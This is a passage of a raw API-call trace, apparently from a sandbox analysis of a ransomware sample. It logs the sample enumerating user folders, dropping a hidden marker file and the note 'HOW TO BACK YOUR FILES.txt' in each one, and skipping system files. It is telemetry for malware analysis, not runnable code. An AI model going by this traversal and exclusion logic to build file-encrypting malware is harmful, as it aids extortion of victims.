lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0055.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1156e8 | out: hHeap=0xe0000) returned 1 [0055.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0055.764] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0055.764] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\" [0055.764] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\.BFC0E91B00AE8A0620D3" [0055.764] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.766] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.768] FlushFileBuffers (hFile=0x27c) returned 1 [0055.769] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.769] CloseHandle (hObject=0x27c) returned 1 [0055.770] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned 40 [0055.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.770] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea8faf43, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0055.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.770] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.770] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.770] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.770] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea8faf43, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.770] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.770] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.770] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.770] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.770] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.770] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea8faf43, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea8faf43, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea8faf43, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.770] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.770] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.770] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 1 [0055.770] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.770] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2=".") returned 1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="..") returned 1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="bootmgr") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="boot") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="ids.txt") returned -1 [0055.771] lstrcmpiW (lpString1="8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.771] lstrcpyW (in: lpString1=0x130eb8a, lpString2="8wekyb3d8bbwe" | out: lpString1="8wekyb3d8bbwe") returned="8wekyb3d8bbwe" [0055.771] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0055.771] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117680 [0055.771] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6490 [0055.771] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 0 [0055.771] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0055.771] lstrcpyW (in: lpString1=0x130eb8a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.771] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.773] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.773] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.773] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.773] CloseHandle (hObject=0x278) returned 1 [0055.773] CloseHandle (hObject=0x27c) returned 1 [0055.773] GetCurrentThreadId () returned 0xd98 [0055.773] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0055.773] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe" [0055.773] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0055.773] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0055.773] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe" [0055.773] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\" [0055.773] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0055.773] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.776] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.779] FlushFileBuffers (hFile=0x27c) returned 1 [0055.780] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.780] CloseHandle (hObject=0x27c) returned 1 [0055.780] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe") returned 54 [0055.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.781] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea920c36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0055.781] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.781] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.781] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.781] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.781] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea920c36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.781] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.781] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.781] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.781] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.781] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.781] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea920c36, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea920c36, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea920c36, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.781] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.781] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.781] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2fbade0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="Rabbit4444.exe") returned -1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2=".") returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="..") returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="windows") returned -1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="bootmgr") returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="pagefile.sys") returned -1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="boot") returned 1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="ids.txt") returned -1 [0055.781] lstrcmpiW (lpString1="Fonts", lpString2="NTUSER.DAT") returned -1 [0055.781] lstrcpyW (in: lpString1=0x130eba6, lpString2="Fonts" | out: lpString1="Fonts") returned="Fonts" [0055.781] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0055.781] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7a) returned 0x101ea8 [0055.781] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6490 [0055.781] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28ee7f08, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28ee7f08, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x28ee7f08, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Licenses", cAlternateFileName="")) returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="Rabbit4444.exe") returned -1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2=".") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="..") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="windows") returned -1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="bootmgr") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="pagefile.sys") returned -1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="boot") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="ids.txt") returned 1 [0055.782] lstrcmpiW (lpString1="Licenses", lpString2="NTUSER.DAT") returned -1 [0055.782] lstrcpyW (in: lpString1=0x130eba6, lpString2="Licenses" | out: lpString1="Licenses") returned="Licenses" [0055.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0055.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0x101518 [0055.782] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf64b0 [0055.782] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea121655, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea121655, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea121655, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsAlarms", cAlternateFileName="MICROS~1.WIN")) returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="Rabbit4444.exe") returned -1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2=".") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="..") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="windows") returned -1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="bootmgr") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="pagefile.sys") returned -1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="boot") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="ids.txt") returned 1 [0055.782] lstrcmpiW (lpString1="Microsoft.WindowsAlarms", lpString2="NTUSER.DAT") returned -1 [0055.782] lstrcpyW (in: lpString1=0x130eba6, lpString2="Microsoft.WindowsAlarms" | out: lpString1="Microsoft.WindowsAlarms") returned="Microsoft.WindowsAlarms" [0055.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0055.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0xf11e8 [0055.782] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6510 [0055.782] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb1a72e3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsContainer", cAlternateFileName="SETTIN~1")) returned 1 [0055.782] lstrcmpiW (lpString1="SettingsContainer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.782] lstrcmpiW (lpString1="SettingsContainer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.782] lstrcmpiW (lpString1="SettingsContainer", lpString2="Rabbit4444.exe") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2=".") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="..") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="windows") returned -1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="bootmgr") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="pagefile.sys") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="boot") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="ids.txt") returned 1 [0055.783] lstrcmpiW (lpString1="SettingsContainer", lpString2="NTUSER.DAT") returned 1 [0055.783] lstrcpyW (in: lpString1=0x130eba6, lpString2="SettingsContainer" | out: lpString1="SettingsContainer") returned="SettingsContainer" [0055.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0055.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113cd8 [0055.783] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6530 [0055.783] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb1a72e3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xdb1a72e3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb1a72e3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsContainer", cAlternateFileName="SETTIN~1")) returned 0 [0055.783] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0055.783] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.783] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.783] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.784] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.784] CloseHandle (hObject=0x278) returned 1 [0055.784] CloseHandle (hObject=0x27c) returned 1 [0055.784] GetCurrentThreadId () returned 0xd98 [0055.784] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0055.784] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer" [0055.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113cd8 | out: hHeap=0xe0000) returned 1 [0055.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0055.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer" [0055.784] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\" [0055.784] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\.BFC0E91B00AE8A0620D3" [0055.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\SettingsContainer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\settingscontainer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.791] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.793] FlushFileBuffers (hFile=0x27c) returned 1 